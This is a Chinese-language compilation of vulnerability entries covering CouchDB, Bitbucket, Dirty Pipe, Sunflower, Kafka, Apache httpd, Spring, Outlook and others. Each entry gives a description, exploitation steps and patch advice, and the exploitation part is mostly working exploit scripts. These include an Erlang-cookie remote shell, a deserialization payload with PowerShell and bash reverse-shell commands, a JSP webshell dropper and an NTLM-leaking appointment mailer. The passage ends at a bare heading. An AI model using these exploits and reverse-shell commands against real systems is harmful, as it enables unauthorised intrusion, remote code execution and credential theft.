Apache CouchDB 权限提升漏洞
在 3.2.2 版本之前的 Apache CouchDB 中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限: CouchDB 打开一个随机网络端口,绑定到所有可用的接口以预期集群操作或runtime introspection,称为 "epmd "的实用程序向网络公布了这个随机端口。epmd 本身在一个固定的端口上监听。 CouchDB 包装之前为单节点和集群安装选择了一个默认的"cookie "值,该cookie 用于验证 Erlang 节点之间的任何通信。 漏洞标签:服务器权限相关、利用链成熟 漏洞编号:CVE-2022-24706 漏洞类型:权限提升 受影响版本:
- Apache CouchDB <3.2.2
利用方法:
exp
# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)
# Date: 2022-01-21
# Exploit Author: Konstantin Burov, @_sadshade
# Software Link: https://couchdb.apache.org/
# Version: 3.2.1 and below
# Tested on: Kali 2021.2
# Based on 1F98D's Erlang Cookie - Remote Code Execution
# Shodan: port:4369 "name couchdb at"
# CVE: CVE-2022-24706
# References:
# https://habr.com/ru/post/661195/
# https://www.exploit-db.com/exploits/49418
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce
#
#
# !/usr/local/bin/python3
import socket
from hashlib import md5
import struct
import sys
import re
import time
TARGET = sys.argv[1]
EPMD_PORT = 4369 # Default Erlang distributed port
COOKIE = "monster" # Default Erlang cookie for CouchDB
ERLNAG_PORT = 0
EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list
# Some data:
NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA"
CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04"
CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03"
CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex"
def compile_cmd(CMD):
MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00"
MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k"
MSG += struct.pack(">H", len(CMD))
MSG += bytes(CMD, 'ascii')
MSG += b'jw\x04user'
PAYLOAD = b'\x70' + CTRL_DATA + MSG
PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
return PAYLOAD
print("Remote Command Execution via Erlang Distribution Protocol.\n")
while not TARGET:
TARGET = input("Enter target host:\n> ")
# Connect to EPMD:
try:
epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
epm_socket.connect((TARGET, EPMD_PORT))
except socket.error as msg:
print("Couldnt connect to EPMD: %s\n terminating program" % msg)
sys.exit(1)
epm_socket.send(EPM_NAME_CMD) # request Erlang nodes
if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK
data = epm_socket.recv(1024)
data = data[0:len(data) - 1].decode('ascii')
data = data.split("\n")
if len(data) == 1:
choise = 1
print("Found " + data[0])
else:
print("\nMore than one node found, choose which one to use:")
line_number = 0
for line in data:
line_number += 1
print(" %d) %s" % (line_number, line))
choise = int(input("\n> "))
ERLNAG_PORT = int(re.search("\d+$", data[choise - 1])[0])
else:
print("Node list request error, exiting")
sys.exit(1)
epm_socket.close()
# Connect to Erlang port:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, ERLNAG_PORT))
except socket.error as msg:
print("Couldnt connect to Erlang server: %s\n terminating program" % msg)
sys.exit(1)
s.send(NAME_MSG)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]
# print("Extracted challenge: {}".format(challenge))
# Add Challenge Digest
CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
+ bytes(str(challenge), "ascii")).digest()
s.send(CHALLENGE_REPLY)
CHALLENGE_RESPONSE = s.recv(1024)
if len(CHALLENGE_RESPONSE) == 0:
print("Authentication failed, exiting")
sys.exit(1)
print("Authentication successful")
print("Enter command:\n")
data_size = 0
while True:
if data_size <= 0:
CMD = input("> ")
if not CMD:
continue
elif CMD == "exit":
sys.exit(0)
s.send(compile_cmd(CMD))
data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
s.recv(45) # Control message
data_size -= 45 # Data size without control message
time.sleep(0.1)
elif data_size < 1024:
data = s.recv(data_size)
# print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode())
data_size = 0
else:
data = s.recv(1024)
# print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode(), end='')
data_size -= 1024
修复建议
- 厂商已发布补丁修复漏洞,用户请尽快更新至安全版本:Apache CouchDB 3.2.2 及更高版本。
- CouchDB 3.2.2 及更高版本将拒绝使用以前默认的 Erlang cookie 值为`monster',升级到此版本的安装将被迫选择不同的值。
- 此外,所有二进制包都已更新,以绑定 epmd 以及 CouchDB 分发端口分别为 127.0.0.1 和/或::1。
- 与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
Atlassian Bitbucket Data Center 远程代码执行漏洞
Atlassian Bitbucket Data Center 存在远程代码执行漏洞。该漏洞是由于Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。 漏洞标签:数据库权限相关、利用链成熟、利用条件简单 漏洞编号:CVE-2022-26133 漏洞类型:RCE 受影响版本:
- Atlassian Bitbucket Data Center >= 5.14.x
- Atlassian Bitbucket Data Center 6.x
- Atlassian Bitbucket Data Center < 7.6.14
- Atlassian Bitbucket Data Center < 7.16.x
- Atlassian Bitbucket Data Center < 7.17.6
- Atlassian Bitbucket Data Center < 7.18.4
- Atlassian Bitbucket Data Center < 7.19.4
- Atlassian Bitbucket Data Center 7.20.0
利用方法:
exp
#!/usr/bin/env python3
# -*- coding: utf_8 -*-
# @Time : 2022/5/7 0007 9:58
from urllib.parse import urlparse
import argparse
import requests
import logging
import socket
import time
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
'''
Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)
# Windows Reverse Shell(未免杀)
command: powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"
# Linux Reverse Shell
command: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
'''
class CVE_2022_26133:
def __init__(self, target):
parse = urlparse(target)
self.url = parse.scheme + "://" + parse.netloc
self.log_init()
self.timeout = 3
self.proxies = None
# self.proxies = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"}
def log_init(self):
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
def str_to_hex(self, param):
ll = []
for i in param:
ll.append(hex(ord(i)).split("x")[1])
return "".join(ll)
def dec_to_hex(self, param, n):
if n == 4:
return '{:04x}'.format(param)
elif n == 8:
return '{:08x}'.format(param)
def get_socket_connect(self):
try:
parse = urlparse(self.url)
target = parse.netloc.split(":")[0]
# default port
port = 5701
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(self.timeout)
sock.connect((target, port))
return sock
except Exception as msg:
logging.critical("target is not reachable, " + str(msg))
def generate_payload(self, cluster, command):
payload = cluster.hex()
payload += "FFFFFF9C"
# yso cb1 payload
payload += "ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870"
payload += self.dec_to_hex((1684 + len(command)), 8)
payload += "CAFEBABE0000003200390A0003002207003707002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01"
payload += self.dec_to_hex((len(command)), 4)
payload += self.str_to_hex(command)
payload += "08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401000D537461636B4D61705461626C6501001D79736F73657269616C2F50776E6572383931393230313938343538303001001F4C79736F73657269616C2F50776E657238393139323031393834353830303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F003800000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F0038000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F003800000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C00000024000300020000000FA70003014CB8002F1231B6003557B1000000010036000000030001030002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78"
# logging.info("payload: " + payload)
return payload
def verify(self, Batch=False):
logging.debug("Checking " + self.url)
try:
sock = self.get_socket_connect()
if sock is not None:
# get ClusterName
data = "000000027361"
sock.send(bytes.fromhex(data))
ClusterName = sock.recv(4) + sock.recv(1024)
sock.close()
if len(ClusterName) != 0:
logging.info("\033[0;36mTarget is vulnerable.\033[0m")
if Batch != False:
with open("success.txt", "a+") as fo:
fo.write(self.url + "\n")
fo.close()
return ClusterName
except Exception as msg:
logging.critical(msg)
def exploit(self, command):
ClusterName = self.verify()
if ClusterName is not None:
try:
sock = self.get_socket_connect()
if sock is not None:
logging.info("command => " + command)
payload = self.generate_payload(ClusterName, command)
sock.send(bytes.fromhex(payload))
time.sleep(0.5)
res = sock.recv(1024)
sock.close()
if len(res) != 0:
logging.info("payload send success, check it.")
except Exception as msg:
if isinstance(msg, ConnectionResetError):
logging.warning("ConnectionResetError: Payload maybe execute successful once target is Linux, Check it.")
else:
logging.critical(msg)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='url', help='input target url, eg: http://192.168.1.1:7990/')
parser.add_argument('--verify', action='store_true', default=False, help='verify mode, verify if target is vulnerable.')
parser.add_argument('-c', dest='command', help='exploit mode, eg: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}')
parser.add_argument('-f', dest='file', help='verify targets in the file if vulnerable.')
args = parser.parse_args()
print("""
______ _______ ____ ___ ____ ____ ____ __ _ __________
/ ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ \ / /_ / |___ /___ /
| | \ \ / /| _| _____ __) | | | |__) | __) |____ __) | '_ \| | |_ \ |_ \
| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/| (_) | |___) |__) |
\____| \_/ |_____| |_____|\___/_____|_____| |_____|\___/|_|____/____/
""")
if args.verify:
CVE_2022_26133(args.url).verify()
elif args.file:
with open(args.file, 'r') as f:
targets = f.readlines()
f.close()
for target in targets:
CVE_2022_26133(target.strip()).verify(True)
elif args.command:
CVE_2022_26133(args.url).exploit(args.command)
运行指令
python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt
修复建议
当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。 链接如下: https://www.atlassian.com/software/bitbucket/download-archives
Linux Kernel 本地权限提升漏洞
CVE-2022-0847 是存在于 Linux 内核 5.8 及之后版本中的本地ᨀ 权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow)但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。 漏洞标签:服务器权限相关、影响范围广、涉及重点系统、漏洞价值大、漏洞细节公开 漏洞编号:CVE-2022-0847 漏洞类型:权限提升 受影响版本:
- 5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
利用方法:
新增普通用户
useradd -m pikaqiu #-m:自动建立用户的登入目录
useradd -s /bin/bash pikaqiu2 #-s:指定用户登入后所使用的shell。
利用方法一
su - pikaqiu #切换成普通用户
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o exp
sudo find / -perm -u=s -type f 2>/dev/null
这个 POC 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权 利用方法二
sudo gitt clone https://github.com/imfiver/CVE-2022-0847
sudo bash Dirty-Pipe.sh
修复建议
更新升级 Linux 内核到以下安全版本:
- Linux 内核 >= 5.16.11
- Linux 内核 >= 5.15.25
- Linux 内核 >= 5.10.102
目前厂商已发布升级补丁以修复漏洞,补丁获取链接: https://www.debian.org/security/2022/dsa-5092
Sapido 多款路由器命令执行漏洞
Sapido 路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以 root 权限执行任意命令。 漏洞标签:服务器权限相关、漏洞细节公开、利用条件简单 漏洞编号:无 漏洞类型:RCE 受影响版本:
- BR270n-v2.1.03
- BRC76n-v2.1.03
- GR297-v2.1.3
- RB1732-v2.0.43
利用方法:
访问 ip/syscmd.htm 即可执行命令
修复建议
- 尽量不要使用命令执行函数。
- 客户端提交的变量在进入执行命令函数前要做好过滤和检测。
- 在使用动态函数之前,确保使用的函数是指定的函数之一。
- 对 PHP 语言来说,不能完全控制的危险函数最好不要使用。
向日葵远程代码执行漏洞
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),安装以下存在 windwos 问题版本的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。 漏洞标签:社会工程学攻击、利用链成熟 漏洞编号:CNVD-2022-10270 漏洞类型:RCE 受影响版本:
- 向日葵个人版 for Windows <= 11.0.0.33
- 向日葵简约版 <= V1.0.1.43315(2021.12)
利用方法:
访问地址:http://ip:port/cgi-bin/rpc?action=verify-haras 抓包得到验证码 构造payload
访问地址:http://ip:port/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
加上cookie:CID=验证码
抓包得到:nt authority\syste
exp
import requests,sys
ip = sys.argv[1]
command = sys.argv[2]
payload1 = "/cgi-bin/rpc?action=verify-haras"
payload2 = "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+"
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
}
if "http://" not in ip:
host = "http://" + ip
else:
host = ip
try:
s = requests.Session()
res = s.get(url=host + payload1,headers=headers)
if res.status_code == 200:
res = res.json()
Cid = res['verify_string']
headers.update({'Cookie':"CID=" + Cid})
res1 = s.get(url=host + payload2 + command,headers=headers)
res1.encoding = "GBK"
print(res1.text)
else:
pass
except Exception as e:
print(e)
修复建议
- 输入检查:应用程序必须实现输入检查机制,将所有从外部接收的数据都进行严格的检查和过滤,防止恶意代码被注入。
- 参数化查询:采用参数化查询可以防止攻击者通过利用应用程序的注入漏洞来修改查询语句,实现任意代码执行的攻击。
- 输出编码:在输出时对敏感字符进行编码保护,比如 HTML 编码,防止恶意代码直接输出执行。
- 使用最新的安全防护措施:保证服务器系统和应用程序的所有组件、库和插件都是最 新的,确保已知的漏洞都得到修复。
Apache Kafka Connect JNDI 注入漏洞
由于 Apache Kafka Connect 中存在 JNDI 注入漏洞,当 Kafka Connect Worker 允许远程访问且可以创建或修改连接器时,恶意攻击者可通过修改连接器的Kafka 客户端属性配置,从而进行 JNDI 注入攻击或反序列化利用,成功利用此漏洞可在目标服务器上执行任意代码,获取目标服务器的控制权限。 漏洞标签:服务器权限相关、影响范围广、利用条件简单 漏洞编号:CVE-2023-25194 漏洞类型:RCE 受影响版本:
- 2.3.0 <= Apache Kafka <= 3.3.2
利用方法:
poc
POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 821
{
"name": "xxx",
"config": {
"connector.class": "io.debezium.connector.mysql.MySqlConnector",
"database.hostname": "127.0.0.1",
"database.port": "3306",
"database.user": "root",
"database.password": "xxxx",
"database.server.id": "xxxx",
"database.server.name": "xxxx",
"database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
"database.history.kafka.topic": "xxxx", "database.history.producer.security.protocol": "SASL_SSL",
"database.history.producer.sasl.mechanism": "PLAIN",
"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://xxxx\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
}
}
修复建议
目前官方已修复该漏洞,受影响用户可以升级更新到安全版本。官方下载链接: https://kafka.apache.org/downloads
Apache HTTP Server 请求走私漏洞
Apache HTTP Server 版本 2.4.0 - 2.4.55 的某些 mod_proxy 配置可能导致HTTP 请求走私攻击,这种攻击可能会导致绕过代理服务器中的访问控制,将非预期的 URL 代理到现有源服务器,以及缓存中毒等。 漏洞标签:服务器权限相关、影响范围广、利用条件简单 漏洞编号:CVE-2023-25690 漏洞类型:HTTP走私请求 受影响版本:
- 2.4.0<= Apache HTTP Server 版本<= 2.4.55
利用方法:
poc(无回显)
import urllib
from pwn import *
def request_prepare():
hexdata = open("pre.txt", "rb").read()
# print(hexdata)
hexdata = hexdata.replace(b' ', b'%20')
hexdata = hexdata.replace(b'\r\n', b'%0d%0a')
# print(hexdata)
uri = b'/hello/abc%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aUser-Agent:%20curl/7.68.0%0d%0a%0d%0a' + hexdata + b'GET%20/flag.txt'
req = b'''GET %b HTTP/1.1\r
Host: 10.7.1.16:8000\r
\r
''' % uri
return req
def send_and_recive(req):
rec = b''
ip = '10.7.1.16'
port = 8000
p = remote(ip, int(port))
p.send(req)
rec += p.recv()
print(rec.decode())
p.close()
return rec.decode()
req = request_prepare()
print(req)
# print(urllib.parse.unquote(req.decode()))
f = open('req.txt', 'wb')
f.write(req)
f.close()
res = send_and_recive(req)
f = open('res.txt', 'wb')
f.write(res.encode())
f.close()
修复建议
目前该漏洞已经修复,受影响用户可升级到以下版本: Apache HTTP Server 版本 >= 2.4.56 下载链接: https://httpd.apache.org/download.cgi 注:Apache HTTP Server 版本 2.4.56 中还修复了通过 mod_proxy_uwsgi 的HTTP 响应走私漏洞(CVE-2023-27522,中危),该漏洞影响了 Apache HTTPServer 版本 2.4.30 - 2.4.55。
Spring Framework 安全绕过漏洞
在带有 mvcRequestMatcher 的 Spring Security 配置中使用无前缀双通配符模式会导致 Spring Security 和 Spring MVC 之间的模式匹配不匹配,并可能导致安全绕过。 漏洞标签:服务器权限相关、影响范围广、利用条件简单、涉及重点系统 漏洞编号:CVE-2023-20860 漏洞类型:认证绕过 受影响版本:
- 6.0.0 - 6.0.6、5.3.0 - 5.3.25(注:5.3 之前的版本不受影响)
利用方法:
exp
#!/usr/bin/env python3
#coding:utf-8
import requests
import argparse
from urllib.parse import urljoin
def Exploit(url):
headers = {"suffix":"%>//",
"c1":"Runtime",
"c2":"<%",
"DNT":"1",
"Content-Type":"application/x-www-form-urlencoded"
}
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
shellurl = urljoin(url, 'tomcatwar.jsp')
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
if shellgo.status_code == 200:
print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
except Exception as e:
print(e)
pass
def main():
parser = argparse.ArgumentParser(description='Srping-Core Rce.')
parser.add_argument('--file',help='url file',required=False)
parser.add_argument('--url',help='target url',required=False)
args = parser.parse_args()
if args.url:
Exploit(args.url)
if args.file:
with open (args.file) as f:
for i in f.readlines():
i = i.strip()
Exploit(i)
if __name__ == '__main__':
main()
修复建议
受影响用户及时更新升级到以下修复版本:
- Spring Framework >= 6.0.7
- Spring Framework >= 5.3.26
下载链接: https://spring.io/projects/spring-framework
Microsoft Outlook 权限提 升漏洞
该漏洞存在于 Microsoft Outlook 中,是一个身份验证绕过漏洞。未经身份验证的远程攻击者仅通过向受影响的系统发送特制电子邮件,从而访问用户的Net-NTLMv2 哈希,进而可以在中继攻击中使用此哈希来冒充用户,从而有效地绕过身份验证。 漏洞标签:漏洞细节公开、利用条件简单 漏洞编号:CVE-2023-23397 漏洞类型:认证绕过 受影响版本:
- Microsoft Outlook 2016 (64-bit edition)
- Microsoft Outlook 2013 Service Pack 1 (32-bit editions)
- Microsoft Outlook 2013 RT Service Pack 1
- Microsoft Outlook 2013 Service Pack 1 (64-bit editions)
- Microsoft Office 2019 for 32-bit editions
- Microsoft 365 Apps for Enterprise for 32-bit Systems
- Microsoft Office 2019 for 64-bit editions
- Microsoft 365 Apps for Enterprise for 64-bit Systems
- Microsoft Office LTSC 2021 for 64-bit editions
- Microsoft Outlook 2016 (32-bit edition)
- Microsoft Office LTSC 2021 for 32-bit editions
利用方法:
exp
import smtplib, datetime, argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.application import MIMEApplication
from email.utils import COMMASPACE, formatdate
from independentsoft.msg import Message
# Mail configuration : change it !
smtp_server = "mail.example.com"
smtp_port = 587
sender_email = "attacker@mail.example.com"
sender_password = "P@ssw0rd"
recipients_email = ["victim@mail.example.com"]
class Email:
def __init__(self, smtp_server, port, username, password, recipient):
self.smtp_server = smtp_server
self.port = port
self.username = username
self.password = password
self.recipient = recipient
def send(self, subject, body, attachment_path):
msg = MIMEMultipart()
msg['From'] = self.username
msg['To'] = COMMASPACE.join(self.recipient)
msg['Date'] = formatdate(localtime=True)
msg['Subject'] = subject
msg.attach(MIMEText(body))
with open(attachment_path, 'rb') as f:
part = MIMEApplication(f.read(), Name=attachment_path)
part['Content-Disposition'] = f'attachment; filename="{attachment_path}"'
msg.attach(part)
try:
server = smtplib.SMTP(self.smtp_server, self.port)
server.starttls()
server.login(self.username, self.password)
server.sendmail(self.username, self.recipient, msg.as_string())
server.quit()
print("[+] Malicious appointment sent !")
except Exception as e:
print("[-] Error with SMTP server...", e)
parser = argparse.ArgumentParser(description='CVE-2023-23397 POC : send a malicious appointment to trigger NetNTLM authentication.')
parser.add_argument('-p', '--path', type=str, help='Local path to process', required=True)
args = parser.parse_args()
appointment = Message()
appointment.message_class = "IPM.Appointment"
appointment.subject = "CVE-2023-23397"
appointment.body = "New meeting now !"
appointment.location = "Paris"
appointment.appointment_start_time = datetime.datetime.now()
appointment.appointment_end_time = datetime.datetime.now()
appointment.reminder_override_default = True
appointment.reminder_sound_file = args.path
appointment.save("appointment.msg")
email = Email(smtp_server, smtp_port, sender_email, sender_password, recipients_email)
subject = "Hello There !"
body = "Important appointment !"
email.send(subject, body, "appointment.msg")
运行指令
python CVE-2023-23397.py --path '\\yourip\'
修复建议
目前微软官方已针对受支持的产品版本发布了修复该漏洞的安全补丁,建议受影响用户开启系统自动更新安装补丁进行防护。 注:由于网络问题、计算机环境问题等原因,Windows Update 的补丁更新可能出现失败。用户在安装补丁后,应及时检查补丁是否成功更新。右键点击Windows 徽标,选择“设置(N)”,选择“更新和安全”-“Windows 更新”,查看该页面上的他提示信息,也可点击“查看更新历史记录”查看历史更新情况。 针对未成功安装更新补丁的情况,可直接下载离线安装包进行更新,链接如下: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2023-23397 临时防护措施 若用户无法正常进行补丁修复,在不影响正常业务的情况下,可使用以下措施对漏洞进行防护: 1、将用户添加到受保护的用户安全组,以防止使用 NTLM 作为身份验证机制。 注意:该操作可能会对需要 NTLM 的应用程序造成一定影响。 详情请参考: https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/protected-users-security-group 2、用户可通过在网络中同时使用外围防火墙和本地防火墙,并通过 VPN 设置来阻止 TCP 445/SMB 从网络出站。 注意:该操作将禁止发送 NTLM 身份验证消息到远程文件共享。
MinIO 信息泄露漏洞
